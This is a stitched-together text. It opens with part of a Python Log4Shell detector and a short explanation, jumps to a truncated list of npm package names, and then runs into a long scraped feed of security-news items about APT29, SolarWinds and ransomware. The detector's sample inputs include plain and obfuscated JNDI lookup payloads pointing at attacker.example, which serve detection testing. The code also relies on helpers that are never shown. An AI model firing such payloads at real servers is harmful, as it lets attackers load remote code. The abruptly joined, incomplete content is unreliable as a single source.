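def normalize(message, max_rounds=32):
    """Resolve nested lookups innermost-first until nothing more can be resolved."""
    for _ in range(max_rounds):
        resolved_any = False

        def substitute(match):
            nonlocal resolved_any
            value = resolve(match.group(1))
            if value is None:
                return match.group(0)
            resolved_any = True
            return value

        message = INNERMOST.sub(substitute, message)
        if not resolved_any:
            break
    return message


def naive_keyword_hit(message):
    """The easily bypassed check from the analyst comment: look for the bare keyword."""
    return "jndi" in message.lower()


def jndi_scheme(message):
    """Scheme of the JNDI lookup (ldap, ldaps, rmi, dns, ...) after normalisation, or None."""
    match = JNDI_PREFIX.search(normalize(message))
    return match.group(1).lower() if match else None


def is_log4shell_probe(message):
    return jndi_scheme(message) is not None


# Constructed sample requests (attacker.example is a reserved name, not an IOC).
PLAIN = "GET /login?user=${jndi:ldap://attacker.example/a} HTTP/1.1"
OBFUSCATED = ("User-Agent: ${${lower:J}${upper:n}${::-d}${env:NO_SUCH_VAR:-i}"
              ":${lower:LDAP}://attacker.example/a}")
BENIGN = "GET /docs/jndi.html HTTP/1.1 ${ctx:requestId}"

if __name__ == "__main__":
    for line in (PLAIN, OBFUSCATED, BENIGN):
        print(f"keyword={naive_keyword_hit(line)!s:5} "
              f"normalised={is_log4shell_probe(line)!s:5} {line}")
```

The benign line shows the other side of the keyword approach: "jndi" in a URL path trips the naive filter while the normalised match ignores it, so the normaliser both catches the disguised form and drops a class of false positives. Returning the scheme lets a rule treat ldap/rmi and dns probes differently, since dns lookups are often only callback beacons.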
The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 […] 2021-12-15T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apache-log4j-zero-day-exploit-google-fighting-glupteba-botnet-vixen-panda-targets-latin-america-and-europe-and-more www.secnews.physaphae.fr/article.php?IdArticle=3800465 False Malware,Tool,Vulnerability,Threat,Cloud APT 37,APT 29,APT 15,APT 15,APT 25 None

Security Affairs - Security Blog Nobelium continues to target organizations worldwide with custom malware 2021-12-07T07:54:37+00:00 https://securityaffairs.co/wordpress/125352/apt/nobelium-custom-malware.html?utm_source=rss&utm_medium=rss&utm_campaign=nobelium-custom-malware www.secnews.physaphae.fr/article.php?IdArticle=3755876 False Malware,Threat APT 29 None

Security Affairs - Security Blog Nobelium APT targets French orgs, French ANSSI agency warns 2021-12-06T22:31:02+00:00 https://securityaffairs.co/wordpress/125342/apt/nobelium-targets-french-orgs.html?utm_source=rss&utm_medium=rss&utm_campaign=nobelium-targets-french-orgs www.secnews.physaphae.fr/article.php?IdArticle=3754433 False None APT 29 None

Mandiant - Mandiant Security Blog Suspected Russian Activity Targeting Government and Business Entities Around the Globe
UPDATE (May 2022): We have merged UNC2452 with APT29. The UNC2452 activity described in this post is now attributed to APT29. As the one-year anniversary of the discovery of the SolarWinds supply chain compromise passes, Mandiant remains committed to tracking one of the toughest actors we have encountered. These suspected Russian actors practice top-notch operational security and advanced tradecraft. However, they are fallible, and we continue to uncover their activity and learn from their mistakes. Ultimately, they remain an adaptable and evolving threat that must be closely studied by […]
2021-12-06T10:00:00+00:00 https://www.mandiant.com/resources/blog/russian-targeting-gov-business www.secnews.physaphae.fr/article.php?IdArticle=8377522 False Threat Solardwinds,APT 29 3.0000000000000000
Anomali - Firm Blog Anomali Cyber Watch: Russian Intelligence Targets IT Providers, Malspam Abuses Squid Games, Another npm Library Compromise, and More Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence BlackMatter: New Data Exfiltration Tool Used in Attacks (published: November 1, 2021) Symantec researchers have discovered a custom data exfiltration tool, dubbed Exmatter, being used by the BlackMatter ransomware group. The same group was also responsible for the Darkside ransomware, the variant that led to the May 2021 Colonial Pipeline outage. Exmatter is compiled as a .NET executable and obfuscated. The tool is designed to steal sensitive data and upload it to an attacker-controlled server as fast as possible prior to deployment of the ransomware. The speed comes from multiple filtering mechanisms: a directory exclusion list, a filetype whitelist, exclusion of files under 1,024 bytes, exclusion of files with certain attributes, and a filename string exclusion list. Exmatter is being actively developed, as three newer versions were found in the wild. Analyst Comment: BlackMatter's Exmatter follows two custom data exfiltration tools linked to the LockBit ransomware operation. Attackers narrow their data sources down to those deemed most profitable or business-critical to speed up the whole exfiltration process. That makes it even more crucial for defenders to be prepared to quickly stop any detected exfiltration. MITRE ATT&CK: [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048 Tags: Exmatter, BlackMatter, Darkside, Ransomware, Exfiltration, Data loss prevention Iran Says Israel, U.S. Likely Behind Cyberattack on Gas Stations (published: October 31, 2021) Iranian General Gholamreza Jalali, head of Iran’s passive defense organization, went on state-run television to blame Israel and the U.S. for an October 26, 2021 cyberattack that paralyzed gasoline stations across the country. The attack on the fuel distribution chain in Iran forced the shutdown of a network of filling stations. The incident disabled government-issued electronic cards providing subsidies that tens of millions of Iranians use to purchase fuel at discounted prices. Jalali said the attack bore similarities to cyber strikes on Iran’s rail network and the Shahid Rajaee port. The latest attack displayed a message reading "cyberattack 64411" on gas pumps when people tried to use their subsidy cards. Similarly, in July 2021, attackers targeting the Iranian railroad prompted victims to call 64411, the phone number for the office of Supreme Leader Ali Khamenei. Analyst Comment: Iran has not provided evidence behind the attribution, so […] 2021-11-02T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-russian-intelligence-targets-it-providers-malspam-abuses-squid-games-another-npm-library-compromise-and-more www.secnews.physaphae.fr/article.php?IdArticle=3598623 False Ransomware,Malware,Tool,Threat,Guideline APT 29,APT 29 None

Security Affairs - Security Blog Russia-linked Nobelium APT targets orgs in the global IT supply chain 2021-10-25T11:41:33+00:00 https://securityaffairs.co/wordpress/123754/apt/nobelium-apt-it-supply-chain.html?utm_source=rss&utm_medium=rss&utm_campaign=nobelium-apt-it-supply-chain www.secnews.physaphae.fr/article.php?IdArticle=3559032 False None APT 29 None

Anomali - Firm Blog Anomali Cyber Watch: Aerospace and Telecoms Targeted by Iranian MalKamak Group, Cozy Bear Refocuses on Cyberespionage, Wicked Panda is Traced by Malleable C2 Profiles, and More Figure 1 - IOC Summary Charts.
These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Russian Cyberattacks Pose Greater Risk to Governments and Other Insights from Our Annual Report (published: October 7, 2021) Approximately 58% of all nation-state attacks observed by Microsoft between July 2020 and June 2021 have been attributed to the Russian-sponsored threat groups, specifically to Cozy Bear (APT29, Nobelium) associated with the Russian Foreign Intelligence Service (SVR). The United States, Ukraine, and the UK were the top three targeted by them. Russian Advanced Persistent Threat (APT) actors increased their effectiveness from a 21% successful compromise rate to a 32% rate comparing year to year. They achieve it by starting an attack with supply-chain compromise, utilizing effective tools such as web shells, and increasing their skills with the cloud environment targeting. Russian APTs are increasingly targeting government agencies for intelligence gathering, which jumped from 3% of their targets a year ago to 53% – largely agencies involved in foreign policy, national security, or defense. Following Russia by the number of APT cyberattacks were North Korea (23%), Iran (11%), and China (8%). Analyst Comment: As the collection of intrusions for potential disruption operations via critical infrastructure attacks became too risky for Russia, it refocused back to gaining access to and harvesting intelligence. The scale and growing effectiveness of the cyberespionage requires a defence-in-depth approach and tools such as Anomali Match that provide real-time forensics capability to identify potential breaches and known actor attributions. 
MITRE ATT&CK: [MITRE ATT&CK] Supply Chain Compromise - T1195 | [MITRE ATT&CK] Server Software Component - T1505 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Brute Force - T1110 Tags: Fancy Bear, APT28, APT29, The Dukes, Strontium, Nobelium, Energetic Bear, Cozy Bear, Government, APT, Russia, SVR, China, North Korea, USA, UK, Ukraine, Iran Ransomware in the CIS (published: October 7, 2021) Many prominent ransomware groups have members located in Russia and the Commonwealth of Independent States (CIS) - and they avoid targeting this region. Still, businesses in the CIS are under the risk of being targeted by dozens of lesser-known ransomware groups. Researchers from Kaspersky Labs have published a report detailing nine business-oriented ransomware trojans that were most active in the CIS in the first half of 2021. These ransomware families are BigBobRoss (TheDMR), Cryakl (CryLock), CryptConsole, Crysis (Dharma), Fonix (XINOF), Limbozar (VoidCrypt), Phobos (Eking), Thanos (Hakbit), and XMRLocker. The oldest, Cryakl, has been around since April 2014, and the newest, XMRLocker, was first detected in August 2020. 
Most of them were mainly distributed via the cracking of Remote Deskto]]> 2021-10-12T17:41:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-aerospace-and-telecoms-targeted-by-iranian-malkamak-group-cozy-bear-refocuses-on-cyberespionage-wicked-panda-is-traced-by-malleable-c2-profiles-and-more www.secnews.physaphae.fr/article.php?IdArticle=3505382 False Ransomware,Malware,Tool,Threat,Guideline,Prediction APT 41,APT 41,APT 39,APT 29,APT 29,APT 28 None Security Affairs - Blog Secu SolarWinds hackers breached 27 state attorneys\' offices 2021-07-31T18:00:04+00:00 https://securityaffairs.co/wordpress/120704/cyber-warfare-2/solarwinds-hackers-breached-state-attorneys-offices.html?utm_source=rss&utm_medium=rss&utm_campaign=solarwinds-hackers-breached-state-attorneys-offices www.secnews.physaphae.fr/article.php?IdArticle=3155911 False None APT 29 None SecurityWeek - Security News Russia\'s APT29 Still Actively Delivering Malware Used in COVID-19 Vaccine Spying 2021-07-30T15:25:25+00:00 http://feedproxy.google.com/~r/securityweek/~3/fj3gvAcPmps/russias-apt29-still-actively-delivering-malware-used-covid-19-vaccine-spying www.secnews.physaphae.fr/article.php?IdArticle=3152083 False Malware APT 29,APT 29 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 
Experts Uncover Several C&C Servers Linked to WellMess Malware ]]> 2021-07-30T03:00:54+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/OGQmE6b-OF4/experts-uncover-several-c-servers.html www.secnews.physaphae.fr/article.php?IdArticle=3150978 False Malware,Threat APT 29 None Kaspersky - Kaspersky Research blog APT trends report Q2 2021 2021-07-29T10:00:46+00:00 https://securelist.com/apt-trends-report-q2-2021/103517/ www.secnews.physaphae.fr/article.php?IdArticle=3147332 False Threat APT 29,APT 31 None Graham Cluley - Blog Security Smashing Security podcast #234: Cozy Bear, dildo scams, and robo hires and fires 2021-07-01T10:47:40+00:00 https://grahamcluley.com/smashing-security-podcast-234/ www.secnews.physaphae.fr/article.php?IdArticle=3005154 False None APT 29 None Security Affairs - Blog Secu Microsoft: Russia-linked SolarWinds hackers breached three new entities 2021-06-26T16:36:51+00:00 https://securityaffairs.co/wordpress/119425/apt/solarwinds-nobelium-ongoing-campaign.html?utm_source=rss&utm_medium=rss&utm_campaign=solarwinds-nobelium-ongoing-campaign www.secnews.physaphae.fr/article.php?IdArticle=2986501 False Threat APT 29 None Anomali - Firm Blog Anomali Cyber Watch: TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations, Necro Python Bots Adds New Tricks, US Seizes Domains Used by APT29 and More Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations (published: June 4, 2021) Researchers at Palo Alto have identified a malware repo belonging to TeamTNT, the prominent cloud focused threat group. The repo shows the expansion of TeamTNTs abilities, and includes scripts for scraping SSH keys, AWS IAM credentials and searching for config files that contain credentials. 
In addition to AWS credentials, TeamTNT are now also searching for Google Cloud credentials, which is the first instance of the group expanding to GCP. Analyst Comment: Any internal only cloud assets & SSH/Privileged access for customer facing cloud infrastructure should only be accessible via company VPN. This ensures attackers don’t get any admin access from over the internet even if keys or credentials are compromised. Customers should monitor compromised credentials in public leaks & reset the passwords immediately for those accounts. MITRE ATT&CK: [MITRE ATT&CK] Permission Groups Discovery - T1069 Tags: AWS, Cloud, Credential Harvesting, cryptojacking, Google Cloud, IAM, scraping, TeamTnT, Black-T, Peirates Necro Python Bots Adds New Tricks (published: June 3, 2021) Researchers at Talos have identified updated functionality in the Necro Python bot. The core functionality is the same with a focus on Monero mining, however exploits to the latest vulnerabilities have been added. The main payloads are XMRig, traffic sniffing and DDoS attacks. Targeting small and home office routers, the bot uses python to support multiple platforms. Analyst Comment: Users should ensure they always apply the latest patches as the bot is looking to exploit unpatched vulnerabilities. Users need to change default passwords for home routers to ensure potential malware on your personal devices don’t spread to your corporate devices through router takeover. 
MITRE ATT&CK: [MITRE ATT&CK] Scripting - T1064 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Remote Access Tools - T1219 Tags: Bot, botnet, Exploit, Monero, Necro Python, Python, Vulnerabilities, XMRig New SkinnyBoy Ma 2021-06-08T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-teamtnt-actively-enumerating-cloud-environments-to-infiltrate-organizations-necro-python-bots-adds-new-tricks-us-seizes-domains-used-by-apt29-and-more www.secnews.physaphae.fr/article.php?IdArticle=2890622 False Ransomware,Malware,Vulnerability,Threat,Patching,Guideline APT 29,APT 28 None Security Affairs - Security Blog US seizes 2 domains used by APT29 in a recent phishing campaign 2021-06-02T07:46:43+00:00 https://securityaffairs.co/wordpress/118495/apt/doj-seized-apt29-domains.html?utm_source=rss&utm_medium=rss&utm_campaign=doj-seized-apt29-domains www.secnews.physaphae.fr/article.php?IdArticle=2867407 False None APT 29 None Bleeping Computer - American Magazine US seizes domains used by APT29 in recent USAID phishing attacks 2021-06-01T16:56:57+00:00 https://www.bleepingcomputer.com/news/security/us-seizes-domains-used-by-apt29-in-recent-usaid-phishing-attacks/ www.secnews.physaphae.fr/article.php?IdArticle=2865812 False Malware APT 29 3.0000000000000000 Anomali - Firm Blog Anomali Cyber Watch: Cozy Bear TTPs, Darkside Ransomware Shuts Down US Pipeline, Operation TunnelSnake Uses New Moriya Rootkit, and More Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Darkside Ransomware Caused Major US Pipeline Shutdown (published: May 8, 2021) A DarkSide ransomware attack caused Colonial Pipeline to shut down the biggest US gasoline pipeline on Friday, May 7th, 2021.
The pipeline is the main source of gasoline, diesel and jet fuel for the US East Coast and runs from Texas to Tennessee and New Jersey, serving up to 50 million people. The DarkSide group began their attack against the company a day earlier, stealing nearly 100 gigabytes of data before locking computers with ransomware and demanding payment. Analyst Comment: While DarkSide's first known activity goes back only to August 2020, it is likely backed by experienced Eastern-European actors. Ransomware protection demands a multi-layered approach that includes isolation, air-gaps, backup solutions, anti-phishing training and detection. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Inhibit System Recovery - T1490 | [MITRE ATT&CK] Scripting - T1064 Tags: DarkSide, ransomware, Oil and Gas, USA, Colonial Pipeline Revealing The 'Snip3' Crypter, A Highly Evasive RAT Loader (published: May 7, 2021) Morphisec has discovered a new stealthy crypter-as-a-service dubbed Snip3. Its advanced anti-detection techniques include: 1) Executing PowerShell code with the ‘remotesigned’ parameter. 2) Validating the existence of Windows Sandbox and VMWare virtualization. 3) Using Pastebin and top4top for staging. 4) Compiling RunPE loaders on the endpoint at runtime. Several hackers were observed using Snip3 to deliver various payloads: AsyncRAT, NetWire RAT, RevengeRAT, and Agent Tesla. Analyst Comment: The Snip3 Crypter’s ability to identify sandboxing and virtual environments makes it especially capable of bypassing detection-centric solutions. It shows the value of investing in complex cybersecurity solutions.
MITRE ATT&CK: [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Command-Line Interface - T1059 | [MITRE ATT&CK] Process Injection - T1055 Tags: Snip3, crypter, Crypter-as-a-Service, VBS, RAT, AsyncRAT, NetWire RAT, RevengeRAT, Agent Tesla, NYANxCAT Lemon Duck target Microsoft Exchange Servers, Incorporate New TTPs (published: May 7, 2021) The Lemon Duck cryptomining group has been active since at least]]> 2021-05-12T21:55:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-cozy-bear-ttps-darkside-ransomware-shuts-down-us-pipeline-operation-tunnelsnake-uses-new-moriya-rootkit-and-more www.secnews.physaphae.fr/article.php?IdArticle=2776510 False Ransomware,Malware,Threat APT 29,APT 29 None Security Affairs - Blog Secu Russia-linked APT29 group changes TTPs following April advisories 2021-05-07T21:03:42+00:00 https://securityaffairs.co/wordpress/117667/apt/apt29-changes-ttps.html?utm_source=rss&utm_medium=rss&utm_campaign=apt29-changes-ttps www.secnews.physaphae.fr/article.php?IdArticle=2754193 False None APT 29 None ComputerWeekly - Computer Magazine NCSC, CISA publish new information on Russia\'s Cozy Bear 2021-05-07T10:15:00+00:00 https://www.computerweekly.com/news/252500409/NCSC-CISA-publish-new-information-on-Russias-Cozy-Bear www.secnews.physaphae.fr/article.php?IdArticle=2752285 False None APT 29,APT 29 None SecurityWeek - Security News FBI/DHS Issue Guidance for Network Defenders to Mitigate Russian Gov Hacking 2021-04-27T19:33:22+00:00 http://feedproxy.google.com/~r/Securityweek/~3/npR_v4OifRk/fbidhs-issue-guidance-network-defenders-mitigate-russian-gov-hacking www.secnews.physaphae.fr/article.php?IdArticle=2704931 False Threat APT 29,APT 29 None Bleeping Computer - Magazine Américain US warns of Russian state hackers still targeting US, foreign orgs 2021-04-26T11:16:34+00:00 https://www.bleepingcomputer.com/news/security/us-warns-of-russian-state-hackers-still-targeting-us-foreign-orgs/ 
www.secnews.physaphae.fr/article.php?IdArticle=2696753 False None APT 29 None ComputerWeekly - Computer Magazine Researchers shed more light on APT29 activity during SolarWinds attack 2021-04-22T10:00:00+00:00 https://www.computerweekly.com/news/252499691/Researchers-shed-more-light-on-APT29-activity-during-SolarWinds-attack www.secnews.physaphae.fr/article.php?IdArticle=2678877 False None APT 29 4.0000000000000000 AlienVault Blog - AlienVault est un acteur de defense majeur dans les IOC Introducing AT&T\'s Managed Endpoint Security with SentinelOne 2020 MITRE ATT&CK test - APT 29 for most total detections and most correlated alerts through comprehensive storyline technology. This autonomous agent utilizes Artificial Intelligence (AI) and machine learning (ML) to help protect against known and unknown threats and eliminates reliance on external factors for protection. This faster, “machine-speed” detection & response provides continuous protection, even when offline. And, in the event of an attack, the SentinelOne agent can perform 1-click remediation and rollback with no custom scripting or re-imaging required. Deep integration with AT&T’s USM platform and Alien Labs OTX AT&T Cybersecurity and SentinelOne bring one of the most unique combinations in the market via the deep integrations between the SentinelOne platform and the AT&T USM platform. This deep integration allows for orchestrated and automated incident response on the endpoints. Additionally, deep integrations were built between the world’s largest open threat intelligence community, AT&T Alien Labs Open Threat Exchange (OTX), and the SentinelOne agent. The AT&T Alien Labs OTX encompasses over 145,000 security professionals submitting over 20 million threat indicators per day. Additional context is provided from the USM sensor network with an additional 20 million threat observations per day and AT&T’s Chief Security Office analyzing over 446 PB of traffic from 200 countries and territories. 
By correlating the incidents of compromise from AT&T Alien Labs OTX, AT&T is able to deliver added context that allows for faster responses. These same AT&T Alien Labs detections and threat intelligence also informs threat hunting on SentinelOne’s EDR data to help yield richer insights and easier detection of evasive threats. Expert management As one of the world's top MSSPs, AT&T Cybersecurity employs highly experienced and industry certified individuals for the Managed Endpoint Security with SentinelOne offering. AT&T brings over 25 years of experience in delivering managed security services and knows what it takes to keep pace with the dynamic threat landscape. To stay ahead, AT&T’s security analysts maintain security certifications including GSE, CISSP, CEH, and more.  For the Managed Endpoint Security with SentinelOne offering, AT&T ]]> 2021-04-19T20:38:00+00:00 https://feeds.feedblitz.com/~/649544360/0/alienvault-blogs~Introducing-ATampT%e2%80%99s-Managed-Endpoint-Security-with-SentinelOne www.secnews.physaphae.fr/article.php?IdArticle=2668051 False Data Breach,Threat,Guideline APT 29 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe NSA: 5 Security Bugs Under Active Nation-State Cyberattack 2021-04-16T18:10:09+00:00 https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/ www.secnews.physaphae.fr/article.php?IdArticle=2654197 False None APT 29 None Security Affairs - Blog Secu Russia-linked APT SVR actively targets these 5 flaws 2021-04-16T12:26:02+00:00 https://securityaffairs.co/wordpress/116891/cyber-warfare-2/russia-svr-actively-targets-5-flaws.html?utm_source=rss&utm_medium=rss&utm_campaign=russia-svr-actively-targets-5-flaws www.secnews.physaphae.fr/article.php?IdArticle=2653026 False None APT 29 None Security Affairs - Blog Secu US Gov sanctions Russia and expels 10 diplomats over SolarWinds hack 2021-04-15T22:20:58+00:00 
https://securityaffairs.co/wordpress/116866/cyber-warfare-2/us-sanctions-russia-solarwinds.html?utm_source=rss&utm_medium=rss&utm_campaign=us-sanctions-russia-solarwinds www.secnews.physaphae.fr/article.php?IdArticle=2649643 False Hack APT 29 None Security Affairs - Blog Secu Russia-linked APT groups exploited Lithuanian infrastructure to launch attacks 2021-03-07T14:54:02+00:00 https://securityaffairs.co/wordpress/115360/apt/russia-apt-lithuanian-infrastructure.html?utm_source=rss&utm_medium=rss&utm_campaign=russia-apt-lithuanian-infrastructure www.secnews.physaphae.fr/article.php?IdArticle=2448286 False Threat APT 29 None Anomali - Firm Blog Anomali Cyber Watch: APT Groups, Cobalt Strike, Russia, Malware, and More get signed up today so you can receive curated and summarized cybersecurity intelligence events weekly. The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, Emotet, Go, Masslogger, Mustang Panda, OilRig, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Hypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact (published: February 26, 2021) Recent reporting indicates that two prolific cybercrime threat groups, CARBON SPIDER and SPRITE SPIDER, have begun targeting ESXi, a hypervisor developed by VMWare to run and manage virtual machines. SPRITE SPIDER uses PyXie's LaZagne module to recover vCenter credentials stored in web browsers and runs Mimikatz to steal credentials from host memory. After authenticating to vCenter, SPRITE SPIDER enables ssh to permit persistent access to ESXi devices. 
In some cases, they also change the root account password or the host’s ssh keys. Before deploying Defray 777, SPRITE SPIDER’s ransomware of choice, they terminate running VMs to allow the ransomware to encrypt files associated with those VMs. CARBON SPIDER has traditionally targeted companies operating POS devices, with initial access being gained using low-volume phishing campaigns against this sector. But throughout 2020 they were observed shifting focus to “Big Game Hunting” with the introduction of the Darkside ransomware. CARBON SPIDER gains access to ESXi servers using valid credentials and reportedly also logs in over ssh using the Plink utility to drop the Darkside Recommendation: Both CARBON SPIDER and SPRITE SPIDER likely intend to use ransomware targeting ESXi to inflict greater harm – and hopefully realize larger profits – than traditional ransomware operations against Windows systems. Should these campaigns continue and prove to be profitable, we would expect more threat actors to imitate these activities. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Hidden Files and Directories - T1158 | [MITRE ATT&CK] Process Discovery - T1057 | [MITRE ATT&CK] File Deletion - T1107 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] Scheduled Transfer - T1029 | 2021-03-02T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apt-groups-cobalt-strike-russia-malware-and-more www.secnews.physaphae.fr/article.php?IdArticle=2422682 False Ransomware,Malware,Threat Wannacry,Wannacry,APT 29,APT 28,APT 31,APT 34 None Mandiant - Mandiant Security Blog Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452 | Blog
UPDATE (May 2022): We have merged UNC2452 with APT29. The UNC2452 activity described in this post and report is now attributed to APT29. UPDATE (Oct. 28, 2021): Mandiant has recently observed targeted threat actors using EWS impersonation (via the ApplicationImpersonation role) to maintain persistent access to mailboxes in victim environments. Once the threat actor has access to this role, its abuse is hard to detect and provides the threat actor control over every mailbox in a victim tenant. Mandiant has also observed targeted threat actors abusing the trust relationship between Cloud
2021-01-19T14:00:00+00:00 https://www.mandiant.com/resources/blog/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452 www.secnews.physaphae.fr/article.php?IdArticle=8377611 False Threat APT 29 4.0000000000000000
Anomali - Firm Blog FireEye, SolarWinds Hacks Show that Detection is Key to Solid Defense state-sponsored adversary. In the case of SolarWinds, it is looking like an adversary was able to dwell in victims’ networks for as long as nine months and that the prime suspect is the Kremlin. There are undoubtedly many organizations wondering if they are caught up in the attacks, either by design or indirectly. Fortunately, those that have effective threat detection capabilities in place can utilize the information FireEye, SolarWinds, Anomali and other threat research organizations are providing to determine if they’ve been hit. Anomali customers are already ahead of the game. As soon as the world becomes aware of an attack, Anomali Threat Research immediately front-loads Anomali ThreatStream with a threat bulletin that provides a detailed and concise narrative of the situation along with a comprehensive list of the known indicators of compromise (IOCs). Once added, information relevant to the incident (IOCs, reports from the security community, signatures, etc.) are automatically delivered to customers. This gives them the ability to automate threat detection and blocking across their security controls, including EDR, firewalls, and SIEM. In addition, customers using Anomali Match, our threat detection and response product, are able to use the threat intelligence to do a retrospective search back to when the threat was active, getting real-time results showing whether the threat was seen in their network at that time. To provide threat intelligence and security operations analysts with a look at what an Anomali threat bulletin looks like, we’ve added the first version of the FireEye threat bulletin to this blog. We are happy to discuss more deeply how Anomali customers are using this information and continual updates to detect the presence of related IOCs in their environments. Reach us at general@anomali.com. 
To listen to a more in-depth conversation on the incident and how threat intelligence aids in detection, listen to this week’s Anomali Detect Podcast. Key Findings Unknown, sophisticated actors stole more than 300 FireEye Red Team tools and countermeasures (signatures) on an unspecified date. An unnamed source for The Washington Post claimed Cozy Bear (APT29), is responsible, but provided no evidence. Actor(s) were also interested in FireEye customers, specifically, government entities. The Red Team countermeasures consisted of custom-versions of known tools, a prioritized Common Vulnerabilities and Exposures (CVE) list, and malware signatures in ClamAV, HXIOC, Snort, and Yara languages. The stolen tools could be customized by actors, just as the FireEye Red Team did to existing tools. ]]> 2020-12-17T18:00:00+00:00 https://www.anomali.com/blog/fireeye-solarwinds-hacks-show-that-detection-is-key-to-solid-defense www.secnews.physaphae.fr/article.php?IdArticle=2108493 False Malware,Threat,Guideline APT 29 None 01net. 
News - Security - French Magazine 18,000 companies and organizations downloaded the backdoor of Putin's hackers 2020-12-15T11:01:00+00:00 https://www.01net.com/actualites/18000entreprises-et-organisations-ont-telecharge-la-backdoor-des-hackers-de-poutine-2019017.html www.secnews.physaphae.fr/article.php?IdArticle=2104485 False None APT 29,APT 19 None Network World - Magazine Info SolarWinds attack explained: And why it was so hard to detect 2020-12-15T03:44:00+00:00 https://www.csoonline.com/article/3601508/solarwinds-supply-chain-attack-explained-why-organizations-were-not-prepared.html#tk.rss_security www.secnews.physaphae.fr/article.php?IdArticle=2102784 False None APT 29 None Wired Threat Level - Security News No One Knows How Deep Russia's Hacking Rampage Goes 2020-12-14T21:36:39+00:00 https://www.wired.com/story/russia-solarwinds-supply-chain-hack-commerce-treasury www.secnews.physaphae.fr/article.php?IdArticle=2101563 False None APT 29 None Mandiant - Mandiant Security Blog Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor
UPDATE (May 2022): We have merged UNC2452 with APT29. The UNC2452 activity described in this post is now attributed to APT29. Executive Summary We have discovered a global intrusion campaign. We are tracking the actors behind this campaign as UNC2452. FireEye discovered a supply chain attack trojanizing SolarWinds Orion business software updates in order to distribute malware we call SUNBURST. The attacker's post-compromise activity leverages multiple techniques to evade detection and obscure their activity, but these efforts also offer some opportunities for detection. The
2020-12-13T22:00:00+00:00 https://www.mandiant.com/resources/blog/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor www.secnews.physaphae.fr/article.php?IdArticle=8377613 False Malware Solardwinds,APT 29 3.0000000000000000
The Hacker News - The Hacker News is a hacking news blog (surprising, isn't it?) | US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor | 2020-12-13T21:44:40+00:00 | http://feedproxy.google.com/~r/TheHackersNews/~3/oCAj1gqVoXA/us-agencies-and-fireeye-were-hacked.html | www.secnews.physaphae.fr/article.php?IdArticle=2099547 | False None APT 29 None
InformationSecurityBuzzNews - Security News Site | Experts On Russian Hackers Target Covid-19 Vaccine Research | 2020-07-17T11:55:00+00:00 | https://www.informationsecuritybuzz.com/expert-comments/experts-on-russian-hackers-target-covid-19-vaccine-research/ | www.secnews.physaphae.fr/article.php?IdArticle=1809662 | False None APT 29 None
InformationSecurityBuzzNews - Security News Site | Cozy Bear Hackers Target Covid-19 Research Centres in UK, US and Canada | 2020-07-17T09:52:24+00:00 | https://www.informationsecuritybuzz.com/expert-comments/cozy-bear-hackers-target-covid-19-research-centres-in-uk-us-and-canada/ | www.secnews.physaphae.fr/article.php?IdArticle=1809551 | False None APT 29 None
IT Security Guru - Security Blog | COVID-19 Researchers Targeted by Russian State-Sponsored Hackers | 2020-07-17T07:54:04+00:00 | https://www.itsecurityguru.org/2020/07/17/covid-19-researchers-targeted-by-russian-state-sponsored-hackers/?utm_source=rss&utm_medium=rss&utm_campaign=covid-19-researchers-targeted-by-russian-state-sponsored-hackers | www.secnews.physaphae.fr/article.php?IdArticle=1809328 | False None APT 29 None
